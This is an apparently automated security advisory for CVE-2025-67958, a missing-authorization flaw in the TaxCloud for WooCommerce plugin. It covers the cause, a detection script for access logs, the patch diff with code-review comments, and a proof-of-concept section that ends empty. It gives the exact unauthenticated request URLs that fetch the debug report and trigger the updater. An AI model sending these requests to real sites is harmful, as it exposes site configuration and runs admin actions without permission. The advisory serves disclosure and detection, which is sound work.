Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-67958: TaxCloud for WooCommerce <= 8.3.8 – Missing Authorization (simple-sales-tax)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 8.3.8
Patched Version: 8.4.0
Disclosed: January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67958:
The TaxCloud for WooCommerce plugin for WordPress versions up to and including 8.3.8 contains a Missing Authorization vulnerability (CWE-862). This flaw allows unauthenticated attackers to trigger a debug report download and a plugin update process, actions that should require administrative privileges. The vulnerability has a CVSS score of 5.3 (Medium severity).

The root cause is the absence of capability checks and nonce verification in two administrative functions. In the vulnerable version, the `maybe_download_debug_report` function in `/simple-sales-tax/includes/admin/class-sst-integration.php` only checked for the presence of the `download_debug_report` GET parameter. The function lacked any verification of the user’s permission (`current_user_can('manage_options')`) or a nonce (`wp_verify_nonce`). Similarly, the `trigger_update` function in `/simple-sales-tax/includes/class-sst-install.php` only checked for the `do_sst_update` GET parameter, missing both nonce and capability checks.

Exploitation is straightforward. An attacker can send a simple HTTP GET request to the WordPress admin endpoint with the specific vulnerable parameter. To trigger the debug report download, an unauthenticated request to `/wp-admin/admin.php?page=wc-settings&tab=integration&section=taxcloud-integration&download_debug_report=true` is sufficient. To trigger the plugin update process, an attacker sends a request to `/wp-admin/?do_sst_update=true`. Both actions execute without any authentication or authorization.

The patch in version 8.4.0 addresses the issue by adding proper authorization and nonce verification. In `class-sst-integration.php`, the condition in `maybe_download_debug_report` was extended to require a valid nonce (`sst_debug_report`) and the `manage_options` capability. The debug report download link in `class-sst-settings.php` was also updated to include the nonce. In `class-sst-install.php`, the `trigger_update` function now verifies the `sst_update` nonce and the `manage_options` capability. The same pattern was applied to the `trigger_rate_removal` function. Before the patch, these endpoints were openly accessible. After the patch, they require a valid nonce and administrator privileges.

Successful exploitation allows an unauthenticated attacker to download a debug report, which may contain sensitive system and configuration information. It also allows triggering the plugin’s internal update routine, which could lead to disruption or be used in conjunction with other flaws. While not a direct remote code execution vulnerability, it represents an unauthorized information disclosure and system action.
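
A log-review sketch for the request patterns described above, as an added example that is not Atomic Edge's or the plugin's code. It assumes common/combined-format access logs; the sample lines, addresses, sizes and nonce value are constructed. Since the 8.4.0 admin links always carry a `nonce` parameter, a trigger parameter under `/wp-admin/` with no nonce did not come from the patched plugin's own UI.

```python
import re
from urllib.parse import urlsplit, parse_qs

# GET parameters from the advisory and diff, mapped to the handler each one reaches.
TRIGGER_PARAMS = {
    "download_debug_report": "maybe_download_debug_report",
    "do_sst_update": "trigger_update",
    "sst_keep_rates": "trigger_rate_removal",
}

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def find_unsigned_triggers(lines):
    """Return one finding per request that carries a trigger parameter under
    /wp-admin/ but no non-empty `nonce` parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        url = urlsplit(m["target"])
        if "/wp-admin/" not in url.path:
            continue
        # parse_qs percent-decodes names, so encoded parameter names still match.
        params = parse_qs(url.query, keep_blank_values=True)
        if any(params.get("nonce", [""])):
            continue  # a nonce was sent; the log cannot tell whether it was valid
        for name, handler in TRIGGER_PARAMS.items():
            if name in params:
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "param": name,
                    "handler": handler, "status": int(m["status"]),
                    "size": m["size"],
                })
    return findings


# Constructed sample lines (documentation IP ranges, made-up sizes and nonce value).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2026:10:02:11 +0000] "GET /wp-admin/admin.php?page=wc-settings&tab=integration&section=taxcloud-integration&download_debug_report=true HTTP/1.1" 200 18432 "-" "curl/8.5.0"',
    '198.51.100.20 - - [21/Jan/2026:10:05:40 +0000] "GET /wp-admin/admin.php?page=wc-settings&tab=integration&section=taxcloud-integration&download_debug_report=1&nonce=0a1b2c3d4e HTTP/1.1" 200 18390 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Jan/2026:10:06:02 +0000] "GET /wp-admin/?do_sst_update=true HTTP/1.1" 302 0 "-" "curl/8.5.0"',
    '198.51.100.20 - - [21/Jan/2026:10:07:15 +0000] "GET /wp-admin/admin.php?page=wc-settings HTTP/1.1" 200 51200 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [21/Jan/2026:10:09:33 +0000] "GET /shop/?sst_keep_rates=no HTTP/1.1" 200 9100 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [21/Jan/2026:10:09:48 +0000] "GET /wp-admin/?sst_keep_rates=no HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_unsigned_triggers(SAMPLE_LOG):
        print(f'{f["time"]} {f["ip"]} {f["param"]} -> {f["handler"]} '
              f'(status {f["status"]}, {f["size"]} bytes)')
```

On a site still running 8.3.8 or earlier, the plugin's own links also lack a nonce, so findings there need to be correlated with authenticated admin sessions; the status and response size help separate a served report from a login redirect.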

Differential between vulnerable and patched code

Code Diff
--- a/simple-sales-tax/includes/admin/class-sst-integration.php
+++ b/simple-sales-tax/includes/admin/class-sst-integration.php
@@ -36,6 +36,7 @@
 		// Register action hooks.
 		add_action( 'woocommerce_update_options_integration_' . $this->id, array( $this, 'process_admin_options' ) );
 		add_action( 'woocommerce_update_options_integration_' . $this->id, array( $this, 'refresh_origin_address_list' ), 15 );
+		add_action( 'woocommerce_update_options_integration_' . $this->id, array( $this, 'update_data_mover_settings' ), 20 );
 		add_action( 'admin_init', array( $this, 'maybe_download_debug_report' ) );
 		add_action( 'woocommerce_hide_sst_address_mismatch_notice', array( $this, 'maybe_dismiss_address_notice' ) );
 	}
@@ -241,7 +242,7 @@
 	 * @since 7.0
 	 */
 	public function maybe_download_debug_report() {
-		if ( ! isset( $_GET['download_debug_report'] ) ) { // phpcs:ignore WordPress.CSRF.NonceVerification
+		if ( ! isset( $_GET['download_debug_report'] ) || ! isset( $_GET['nonce'] ) || ! wp_verify_nonce( $_GET['nonce'], 'sst_debug_report' ) || ! current_user_can( 'manage_options' ) ) {
 			return;
 		}

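Review bot: In the new condition of `maybe_download_debug_report()`, `$_GET['nonce']` reaches `wp_verify_nonce()` without `wp_unslash()` and `sanitize_text_field()`, which the WordPress coding standards expect for superglobal input; unslash and sanitize it first. The four-way `||` would also read better as separate early returns, so the `current_user_can( 'manage_options' )` authorization decision sits on its own line.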
@@ -411,4 +412,93 @@
 		$updater->save()->dispatch();
 	}

+	/**
+	 * Generates the integration mode HTML.
+	 *
+	 * @param string $key  The field key.
+	 * @param array  $data The field data.
+	 *
+	 * @return string The integration mode HTML.
+	 */
+	public function generate_integration_mode_html( $key, $data ) {
+		$field            = "{$this->plugin_id}{$this->id}_{$key}";
+		$api_id           = SST_Settings::get( 'tc_id' );
+		$api_key          = SST_Settings::get( 'tc_key' );
+		$data_mover       = SST_Settings::get( 'data_mover', false );
+
+		$integration_mode = $data_mover == false ? __( 'Premium', 'simple-sales-tax' ) : __( 'Basic', 'simple-sales-tax' );
+
+		ob_start();
+		?>
+
+		<tr valign="top">
+			<th scope="row" class="titledesc">
+				<label for="<?php echo esc_attr( $field ); ?>">
+					<?php echo wp_kses_post( $data['title'] ); ?>
+					<?php if ( ! empty( $api_id ) && ! empty( $api_key ) ): ?>
+						<?php echo wp_kses_post( $this->get_tooltip_html( $data ) ); ?>
+					<?php endif; ?>
+				</label>
+			</th>
+			<td class="forminp">
+				<fieldset>
+					<legend class="screen-reader-text">
+						<span><?php echo wp_kses_post( $data['title'] ); ?></span>
+					</legend>
+					<?php if ( ! empty( $api_id ) && ! empty( $api_key ) ): ?>
+						<div class="d-flex">
+							<input type="text"
+								id="<?php echo esc_attr( $field ); ?>"
+								value="<?php echo esc_attr( $integration_mode ); ?>"
+								readonly="readonly"
+								disabled="disabled">
+								<button type="button" class="components-button is-secondary sst-update-data-mover" data-nonce="<?php echo wp_create_nonce( 'sst-update-data-mover-nonce' ); ?>">
+									<span class="dashicons dashicons-update"></span>
+									<?php echo wp_kses_post( __( 'Refresh', 'simple-sales-tax' ) ); ?>
+								</button>
+						</div>
+						<div class="description">
+							<p>
+								<?php
+								echo wp_kses_post(
+									__(
+										'Premium users can calculate tax in real-time while Basic users can only do data import to TaxCloud.',
+										'simple-sales-tax'
+									)
+								);
+								?>
+								<a href="https://app.taxcloud.com/go/integrations" target="_blank">
+									<?php echo wp_kses_post( __( 'Configure in TaxCloud', 'simple-sales-tax' ) ); ?>
+								</a>
+							</p>
+						</div>
+					<?php else: ?>
+						<div class="notice notice-info inline sst-settings-notice">
+							<p>
+								<?php
+								echo wp_kses_post(
+									__(
+										'Enter your TaxCloud API credentials and click <strong>Save changes</strong> to display the Integration Mode.',
+										'simple-sales-tax'
+									)
+								);
+								?>
+							</p>
+						</div>
+					<?php endif; ?>
+					<?php echo wp_kses_post( $this->get_description_html( $data ) ); ?>
+				</fieldset>
+			</td>
+		</tr>
+		<?php
+		return ob_get_clean();
+	}
+
+	/**
+	 * Updates the data mover settings.
+	 */
+	public function update_data_mover_settings() {
+		SST_TaxCloud_V3_API::update_data_mover_settings();
+	}
+
 }
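Review bot: On the `sst-update-data-mover` button in `generate_integration_mode_html()`, the `data-nonce` attribute echoes `wp_create_nonce( 'sst-update-data-mover-nonce' )` without `esc_attr()`, unlike the `id` and `value` attributes a few lines above it; wrap it so every attribute in the template is escaped the same way. `$data_mover == false` is a loose comparison; `! $data_mover` states the intent more clearly.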
--- a/simple-sales-tax/includes/admin/views/html-notice-update.php
+++ b/simple-sales-tax/includes/admin/views/html-notice-update.php
@@ -20,7 +20,7 @@
 	?>
 </p>
 <p class="submit">
-	<a href="<?php echo esc_url( admin_url( '?do_sst_update=true' ) ); ?>" class="wc-update-now button-primary">
+	<a href="<?php echo esc_url( admin_url( '?do_sst_update=true&nonce=' . wp_create_nonce( 'sst_update' ) ) ); ?>" class="wc-update-now button-primary">
 		<?php esc_html_e( 'Run the updater', 'simple-sales-tax' ); ?>
 	</a>
 </p>
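Review bot: The updater link in `html-notice-update.php` appends the nonce by string concatenation (`'?do_sst_update=true&nonce=' . wp_create_nonce( 'sst_update' )`). Building it with `add_query_arg()`, as the debug report link in `class-sst-settings.php` does in this same patch, keeps the two links consistent and leaves the encoding to WordPress.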
--- a/simple-sales-tax/includes/class-simplesalestax.php
+++ b/simple-sales-tax/includes/class-simplesalestax.php
@@ -20,7 +20,7 @@
 	 *
 	 * @var string
 	 */
-	    public $version = '8.3.8';
+	    public $version = '8.4.0';

 	/**
 	 * The singleton plugin instance.
@@ -138,6 +138,8 @@
 		require_once __DIR__ . '/class-sst-assets.php';
 		require_once __DIR__ . '/class-sst-marketplaces.php';
 		require_once __DIR__ . '/class-sst-blocks.php';
+		require_once __DIR__ . '/class-sst-taxcloud-v3-api.php';
+		require_once __DIR__ . '/class-sst-taxcloud-v3.php';

 		/**
 		 * Third party integrations.
--- a/simple-sales-tax/includes/class-sst-ajax.php
+++ b/simple-sales-tax/includes/class-sst-ajax.php
@@ -29,6 +29,7 @@
 		'sst_get_certificates'        => false,
 		'sst_dismiss_taxcloud_notice'	=> false,
 		'sst_get_order_log'						=> false,
+		'sst_update_data_mover'				=> false,
 	);

 	/**
@@ -79,6 +80,10 @@
 		} else {
 			try {
 				TaxCloud()->Ping( new TaxCloudRequestPing( $taxcloud_id, $taxcloud_key ) );
+
+				// Ping successful, update data mover settings
+				$data_mover_settings = SST_TaxCloud_V3_API::update_data_mover_settings( $taxcloud_id, $taxcloud_key );
+
 				wp_send_json_success();
 			} catch ( Exception $ex ) {
 				wp_send_json_error( $ex->getMessage() );
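Review bot: In the ping handler, `$data_mover_settings` is assigned from `SST_TaxCloud_V3_API::update_data_mover_settings()` and never read in the lines shown; drop the assignment or use the result. The call also puts two remote requests, each with a 30 second timeout in `class-sst-taxcloud-v3-api.php`, ahead of `wp_send_json_success()`, so a slow v3 endpoint delays the verify-settings response.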
@@ -352,6 +357,25 @@
 		wp_send_json_success();
 	}

+	/**
+	 * Update Data Mover settings.
+	 *
+	 * @since 8.3.5
+	 */
+	public static function update_data_mover() {
+		// Verify nonce.
+		check_ajax_referer( 'sst-update-data-mover-nonce' );
+
+		// Update data mover settings
+		SST_TaxCloud_V3_API::update_data_mover_settings();
+
+		// Get data mover settings
+		$data_mover = SST_Settings::get( 'data_mover', false );
+		$integration_mode = $data_mover == false ? __( 'Premium', 'simple-sales-tax' ) : __( 'Basic', 'simple-sales-tax' );
+
+		// Response
+		wp_send_json_success( [ 'integration_mode' => $integration_mode, 'data_mover' => $data_mover ] );
+	}

 }

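Review bot: `update_data_mover()` checks only `check_ajax_referer( 'sst-update-data-mover-nonce' )` before calling `SST_TaxCloud_V3_API::update_data_mover_settings()`. A nonce is not a capability check, and this release adds `current_user_can( 'manage_options' )` to the other admin handlers for that reason; add the same check here. The `@since 8.3.5` tag also disagrees with the `@since 8.4.0` on the new v3 classes.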
--- a/simple-sales-tax/includes/class-sst-assets.php
+++ b/simple-sales-tax/includes/class-sst-assets.php
@@ -109,6 +109,7 @@
 								'verify_btn'       => __( 'Verify Settings', 'simple-sales-tax' ),
 								'verifying'        => __( 'Verifying...', 'simple-sales-tax' ),
 								'went_wrong'      => __( 'Something went wrong.', 'simple-sales-tax' ),
+								'mode_refreshed'   => __( 'Success! Your integration mode is now ', 'simple-sales-tax' ),
 							),
 						),
 					),
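Review bot: The new `mode_refreshed` string ends in a trailing space (`'Success! Your integration mode is now '`), which suggests the mode name is appended by concatenation on the client. Translators cannot reorder a concatenated sentence; use a placeholder in the string and substitute the mode into it.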
--- a/simple-sales-tax/includes/class-sst-install.php
+++ b/simple-sales-tax/includes/class-sst-install.php
@@ -82,6 +82,7 @@
 	 */
 	public static function deactivate() {
 		self::remove_notices();
+		self::remove_cron();
 	}

 	/**
@@ -154,8 +155,9 @@

 		// Prompt user to remove rates if any are present.
 		if ( 'yes' !== get_option( 'wootax_keep_rates' ) && self::has_other_rates() ) {
-			$keep_url   = esc_url( admin_url( '?sst_keep_rates=yes' ) );
-			$delete_url = esc_url( admin_url( '?sst_keep_rates=no' ) );
+			$nonce      = wp_create_nonce( 'sst_keep_rates' );
+			$keep_url   = esc_url( admin_url( '?sst_keep_rates=yes&nonce=' . $nonce ) );
+			$delete_url = esc_url( admin_url( '?sst_keep_rates=no&nonce=' . $nonce ) );
 			$notice     = sprintf(
 				/* translators: 1 - URL to keep found rates, 2 - URL to delete found rates */
 				__(
@@ -176,7 +178,7 @@
 	 * Start update when a user clicks the "Update" button in the dashboard.
 	 */
 	public static function trigger_update() {
-		if ( ! empty( $_GET['do_sst_update'] ) ) { // phpcs:ignore WordPress.CSRF.NonceVerification
+		if ( ! empty( $_GET['do_sst_update'] ) && wp_verify_nonce( $_GET['nonce'], 'sst_update' ) && current_user_can( 'manage_options' ) ) {
 			self::update();

 			// Update notice content.
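Review bot: In `trigger_update()`, `wp_verify_nonce( $_GET['nonce'], 'sst_update' )` reads `$_GET['nonce']` without an `isset()` guard, so a request that carries `do_sst_update` but no nonce raises an undefined-index notice before the check fails. `maybe_download_debug_report()` guards with `isset( $_GET['nonce'] )`; do the same here, and unslash and sanitize the value before verifying it.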
@@ -189,11 +191,10 @@
 	 * Remove rates when user clicks 'keep the rates' or 'delete them.'
 	 */
 	public static function trigger_rate_removal() {
-		global $wpdb;
-
 		$keep_rates = ! empty( $_GET['sst_keep_rates'] ) ? sanitize_text_field( wp_unslash( $_GET['sst_keep_rates'] ) ) : ''; // phpcs:ignore WordPress.CSRF.NonceVerification

-		if ( ! empty( $keep_rates ) ) {
+		if ( ! empty( $keep_rates ) && wp_verify_nonce( $_GET['nonce'], 'sst_keep_rates' ) && current_user_can( 'manage_options' ) ) {
+			global $wpdb;
 			if ( 'no' === $keep_rates ) {
 				$wpdb->query(
 					$wpdb->prepare(
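Review bot: `trigger_rate_removal()` has the same unguarded `$_GET['nonce']` read as `trigger_update()`, and the `// phpcs:ignore WordPress.CSRF.NonceVerification` on the `$keep_rates` line is left in place although the nonce is now verified, while the other two handlers dropped theirs. Add the `isset()` guard and remove the stale suppression.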
@@ -381,6 +382,13 @@
 			remove_filter( 'woocommerce_order_get_items', array( $GLOBALS['wcms']->order, 'order_item_taxes' ), 30 );
 		}
 	}
+
+	/**
+	 * Remove cron job.
+	 */
+	public static function remove_cron() {
+		wp_clear_scheduled_hook( 'sst_update_data_mover_settings' );
+	}
 }

 SST_Install::init();
--- a/simple-sales-tax/includes/class-sst-marketplaces.php
+++ b/simple-sales-tax/includes/class-sst-marketplaces.php
@@ -65,7 +65,7 @@
 			// Hide the origin address dropdown. We always use the vendor's
 			// address as the origin address in the marketplace setting.
 			add_filter( 'sst_show_origin_address_dropdown', '__return_false' );
-			add_filter( 'sst_settings_form_fields', array( $this, 'change_origin_addresses_description' ) );
+			add_filter( 'sst_settings_form_fields', array( $this, 'change_origin_addresses_description' ), 10, 2 );
 		}
 	}

@@ -110,7 +110,7 @@
 	 *
 	 * @return array
 	 */
-	public function change_origin_addresses_description( $fields ) {
+	public function change_origin_addresses_description( $fields, $settings ) {
 		if ( ! isset( $fields['default_origin_addresses'] ) ) {
 			return $fields;
 		}
--- a/simple-sales-tax/includes/class-sst-settings.php
+++ b/simple-sales-tax/includes/class-sst-settings.php
@@ -123,6 +123,20 @@
 				'desc_tip'    => true,
 				'id'          => 'verifySettings',
 			),
+			'integration_mode'            => array(
+				'title'       => __( 'Integration Mode', 'simple-sales-tax' ),
+				'type'        => 'integration_mode',
+				'default'     => '',
+				'desc_tip'    => true,
+				'description' => __(
+					'Click the refresh button to check TaxCloud for the current mode setting.',
+					'simple-sales-tax'
+				),
+				'custom_attributes' => array(
+					'readonly' => 'readonly',
+					'disabled' => 'disabled',
+				),
+			),
 			'address_settings'            => array(
 				'title'       => __( 'Address Settings', 'simple-sales-tax' ),
 				'type'        => 'title',
@@ -361,7 +375,7 @@
 				'title'       => __( 'Debug Report', 'simple-sales-tax' ),
 				'label'       => __( 'Download', 'simple-sales-tax' ),
 				'type'        => 'anchor',
-				'url'         => add_query_arg( 'download_debug_report', true ),
+				'url'         => add_query_arg( array( 'download_debug_report' => true, 'nonce' => wp_create_nonce( 'sst_debug_report' ) ) ),
 				'id'          => 'debug_report_button',
 				'description' => __(
 					'Send a copy of this report to TaxCloud support to help with debugging TaxCloud for WooCommerce issues.',
@@ -371,7 +385,7 @@
 			),
 		);

-		return apply_filters( 'sst_settings_form_fields', $fields );
+		return apply_filters( 'sst_settings_form_fields', $fields, self::get_settings() );
 	}

 	/**
@@ -419,7 +433,7 @@
 			self::$settings[ $key ] = $empty_value;
 		}

-		return self::$settings[ $key ];
+		return apply_filters( 'sst_get_option', self::$settings[ $key ], $key );
 	}

 	/**
@@ -453,4 +467,17 @@
 		return $wp_roles->get_names();
 	}

+	/**
+	 * Get SST settings
+	 *
+	 * @return array
+	 */
+	public static function get_settings() {
+		if ( empty( self::$settings ) ) {
+			self::load_settings();
+		}
+
+		return self::$settings;
+	}
+
 }
--- a/simple-sales-tax/includes/class-sst-taxcloud-v3-api.php
+++ b/simple-sales-tax/includes/class-sst-taxcloud-v3-api.php
@@ -0,0 +1,182 @@
+<?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+/**
+ * TaxCloud v3 API Client.
+ *
+ * Handles authentication and settings retrieval from TaxCloud v3 API.
+ *
+ * @author  Simple Sales Tax
+ * @package SST
+ * @since   8.4.0
+ */
+class SST_TaxCloud_V3_API {
+
+	/**
+	 * API Base URLs.
+	 */
+	const STAGING_AUTH_URL = 'https://staging-taxcloudapi.azurewebsites.net/api/v3/auth/token';
+	const PROD_AUTH_URL    = 'https://taxcloudapi-appservice-core-prod.azurewebsites.net/api/v3/auth/token';
+	const STAGING_MGMT_URL = 'https://api.v3.taxcloud.net/mgmt';
+	const PROD_MGMT_URL    = 'https://api.v3.taxcloud.com/mgmt';
+
+	/**
+	 * Get the appropriate Auth URL based on environment.
+	 *
+	 * @return string
+	 */
+	private static function get_auth_url() {
+		// For now, we'll default to PROD unless a constant is defined for staging.
+		// In the future, this could be a setting.
+		if ( defined( 'SST_TAXCLOUD_STAGING' ) && SST_TAXCLOUD_STAGING ) {
+			return self::STAGING_AUTH_URL;
+		}
+		return self::PROD_AUTH_URL;
+	}
+
+	/**
+	 * Get the appropriate Management URL based on environment.
+	 *
+	 * @return string
+	 */
+	private static function get_mgmt_url() {
+		if ( defined( 'SST_TAXCLOUD_STAGING' ) && SST_TAXCLOUD_STAGING ) {
+			return self::STAGING_MGMT_URL;
+		}
+		return self::PROD_MGMT_URL;
+	}
+
+	/**
+	 * Exchange v1 credentials for v3 Bearer token.
+	 *
+	 * @param string $api_login_id TaxCloud API Login ID.
+	 * @param string $api_key      TaxCloud API Key.
+	 * @return string|WP_Error Access token on success, WP_Error on failure.
+	 */
+	public static function get_auth_token( $api_login_id, $api_key ) {
+		$url = self::get_auth_url();
+
+		$response = wp_remote_post( $url, array(
+			'headers' => array(
+				'Content-Type' => 'application/json',
+			),
+			'body'    => json_encode( array(
+				'apiLoginID' => $api_login_id,
+				'apiKey'     => $api_key,
+			) ),
+			'timeout' => 30,
+		) );
+
+		if ( is_wp_error( $response ) ) {
+			return $response;
+		}
+
+		$code = wp_remote_retrieve_response_code( $response );
+		$body = wp_remote_retrieve_body( $response );
+		$data = json_decode( $body, true );
+
+		if ( $code >= 400 ) {
+			return new WP_Error( 'sst_v3_auth_error', 'Failed to authenticate with TaxCloud v3 API: ' . ( isset( $data['message'] ) ? $data['message'] : $body ) );
+		}
+
+		if ( empty( $data['access_token'] ) ) {
+			return new WP_Error( 'sst_v3_auth_error', 'No access token received from TaxCloud v3 API.' );
+		}
+
+		return $data['access_token'];
+	}
+
+	/**
+	 * Get connection settings using Bearer token.
+	 *
+	 * @param string $api_key      TaxCloud API Key (used as connection ID).
+	 * @param string $access_token Bearer token.
+	 * @return array|WP_Error Settings array on success, WP_Error on failure.
+	 */
+	public static function get_connection_settings( $api_key, $access_token ) {
+		$url = self::get_mgmt_url() . '/connections/' . $api_key;
+
+		$response = wp_remote_get( $url, array(
+			'headers' => array(
+				'Authorization' => 'Bearer ' . $access_token,
+				'Content-Type'  => 'application/json',
+			),
+			'timeout' => 30,
+		) );
+
+		if ( is_wp_error( $response ) ) {
+			return $response;
+		}
+
+		$code = wp_remote_retrieve_response_code( $response );
+		$body = wp_remote_retrieve_body( $response );
+
+		if ( $code === 404 ) {
+			// Connection settings don't exist yet, which is normal for new connections.
+			// Return empty settings.
+			return array();
+		}
+
+		if ( $code >= 400 ) {
+			return new WP_Error( 'sst_v3_settings_error', 'Failed to retrieve connection settings: ' . $body );
+		}
+
+		return json_decode( $body, true );
+	}
+
+	/**
+	 * Get settings using v1 credentials.
+	 *
+	 * @param string $api_login_id TaxCloud API Login ID.
+	 * @param string $api_key      TaxCloud API Key.
+	 * @return array|WP_Error Settings array on success, WP_Error on failure.
+	 */
+	public static function get_settings_with_v1_creds( $api_login_id, $api_key ) {
+		$token = self::get_auth_token( $api_login_id, $api_key );
+
+		if ( is_wp_error( $token ) ) {
+			return $token;
+		}
+
+		return self::get_connection_settings( $api_key, $token );
+	}
+
+	/**
+	 * Update data mover settings using v1 credentials.
+	 *
+	 * @param string $api_login_id TaxCloud API Login ID.
+	 * @param string $api_key      TaxCloud API Key.
+	 * @return array|WP_Error Settings array on success, WP_Error on failure.
+	 */
+	public static function update_data_mover_settings( $api_login_id = null, $api_key = null ) {
+		if ( !$api_login_id || !$api_key ) {
+			$api_login_id	= SST_Settings::get( 'tc_id' );
+			$api_key			= SST_Settings::get( 'tc_key' );
+		}
+
+		// Return if empty
+		if ( empty( $api_login_id ) || empty( $api_key ) ) {
+			SST_Logger::add( 'Failed to update data mover settings: API Login ID or API Key is empty' );
+			return;
+		}
+
+		// Add to cronjob to check daily
+		if ( ! wp_next_scheduled( 'sst_update_data_mover_settings' ) ) {
+			wp_schedule_event( time(), 'daily', 'sst_update_data_mover_settings' );
+		}
+
+		// Check v3 settings
+		$v3_settings = self::get_settings_with_v1_creds( $api_login_id, $api_key );
+
+		if ( ! is_wp_error( $v3_settings ) ) {
+			$data_mover = (bool) isset( $v3_settings['options']['data_mover']['flag'] ) && $v3_settings['options']['data_mover']['flag'];
+			SST_Settings::set( 'data_mover', $data_mover );
+		} else {
+			// Log error but don't fail verification if v3 fails (optional, depending on strictness)
+			SST_Logger::add( 'Failed to fetch v3 settings: ' . $v3_settings->get_error_message() );
+		}
+	}
+}
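Review bot: In `get_connection_settings()`, `$api_key` is concatenated into the request path (`'/connections/' . $api_key`) without `rawurlencode()`, and on a 4xx the raw response body can end up in the `WP_Error` message from both `get_auth_token()` and `get_connection_settings()`, which `update_data_mover_settings()` then writes to `SST_Logger`. Encode the path segment and log a status code or a bounded message instead of the full body. The docblock on `update_data_mover_settings()` also promises `array|WP_Error`, but no path in the function returns a value.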
--- a/simple-sales-tax/includes/class-sst-taxcloud-v3.php
+++ b/simple-sales-tax/includes/class-sst-taxcloud-v3.php
@@ -0,0 +1,87 @@
+<?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+/**
+ * TaxCloud v3 Client.
+ *
+ * Handles the data v3 settings.
+ *
+ * @author  Simple Sales Tax
+ * @package SST
+ * @since   8.4.0
+ */
+class SST_TaxCloud_V3 {
+
+	/**
+	 * Singleton instance.
+	 *
+	 * @var SST_TaxCloud_V3
+	 */
+	protected static $_instance = null;
+
+	/**
+	 * Singleton instance accessor.
+	 *
+	 * @return SST_TaxCloud_V3
+	 */
+	public static function instance() {
+		if ( is_null( self::$_instance ) ) {
+			self::$_instance = new self();
+		}
+
+		return self::$_instance;
+	}
+
+	/**
+	 * SST_TaxCloud_V3 constructor.
+	 */
+	protected function __construct() {
+		add_action( 'sst_update_data_mover_settings', array( 'SST_TaxCloud_V3_API', 'update_data_mover_settings' ) );
+		add_filter( 'sst_get_option', array( $this, 'update_realtime_calc_option' ), 10, 2 );
+		add_filter( 'sst_settings_form_fields', array( $this, 'disable_real_time_calc_option' ), 10, 2 );
+	}
+
+	/**
+	 * Disable the disable_real_time_calc option if data mover is true.
+	 *
+	 * @param array $fields Array of settings fields.
+	 *
+	 * @return array
+	 */
+	public function disable_real_time_calc_option( $fields, $settings ) {
+		$data_mover = isset( $settings['data_mover'] ) ? (bool) $settings['data_mover'] : false;
+		if( $data_mover ) {
+			$fields['disable_real_time_calc']['disabled'] =  $data_mover;
+			$fields['disable_real_time_calc']['options'] = array(
+				'yes' => __( 'Yes', 'simple-sales-tax' ),
+			);
+		}
+		return $fields;
+	}
+
+
+	/**
+	 * Update the disable_real_time_calc option if data mover is true.
+	 *
+	 * @param string $value Value of the option.
+	 * @param string $key   Key of the option.
+	 *
+	 * @return string
+	 */
+	public function update_realtime_calc_option( $value, $key ) {
+		if( 'disable_real_time_calc' === $key ) {
+			$data_mover = SST_Settings::get( 'data_mover', false );
+			if( $data_mover ) {
+				return 'yes';
+			}
+		}
+		return $value;
+	}
+
+}
+
+// Initialize the instance.
+SST_TaxCloud_V3::instance();
 No newline at end of file
--- a/simple-sales-tax/includes/sst-functions.php
+++ b/simple-sales-tax/includes/sst-functions.php
@@ -570,4 +570,4 @@
  */
 function sst_get_rate_code() {
 	return apply_filters( 'wootax_rate_code', 'SALES-TAX' );
-}
+}
 No newline at end of file
--- a/simple-sales-tax/includes/vendor/composer/installed.php
+++ b/simple-sales-tax/includes/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'simplesalestax/simplesalestax',
-        'pretty_version' => 'v8.3.8',
-        'version' => '8.3.8.0',
-        'reference' => '38a201072bc1d5afd200a3b5a54149581e0bf66d',
+        'pretty_version' => 'v8.4.0',
+        'version' => '8.4.0.0',
+        'reference' => '92cc977822bc6208e5c1bc0d8606973a97ccb1b1',
         'type' => 'project',
         'install_path' => __DIR__ . '/../../../',
         'aliases' => array(),
@@ -20,9 +20,9 @@
             'dev_requirement' => false,
         ),
         'simplesalestax/simplesalestax' => array(
-            'pretty_version' => 'v8.3.8',
-            'version' => '8.3.8.0',
-            'reference' => '38a201072bc1d5afd200a3b5a54149581e0bf66d',
+            'pretty_version' => 'v8.4.0',
+            'version' => '8.4.0.0',
+            'reference' => '92cc977822bc6208e5c1bc0d8606973a97ccb1b1',
             'type' => 'project',
             'install_path' => __DIR__ . '/../../../',
             'aliases' => array(),
--- a/simple-sales-tax/simple-sales-tax.php
+++ b/simple-sales-tax/simple-sales-tax.php
@@ -7,15 +7,15 @@
  * Author:               TaxCloud
  * Author URI:           https://taxcloud.com
  * GitHub Plugin URI:    https://github.com/bporcelli/simplesalestax
- * Version:              8.3.8
+ * Version:              8.4.0
  * Text Domain:          simple-sales-tax
  * Domain Path:          /languages/
  * License:              GPLv2 or later
  *
  * Requires at least:    4.5.0
- * Tested up to:         6.8.0
+ * Tested up to:         6.9
  * WC requires at least: 6.9.0
- * WC tested up to:      10.2.1
+ * WC tested up to:      10.3.5
  * Requires PHP:         7.4
  *
  * @category             Plugin

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
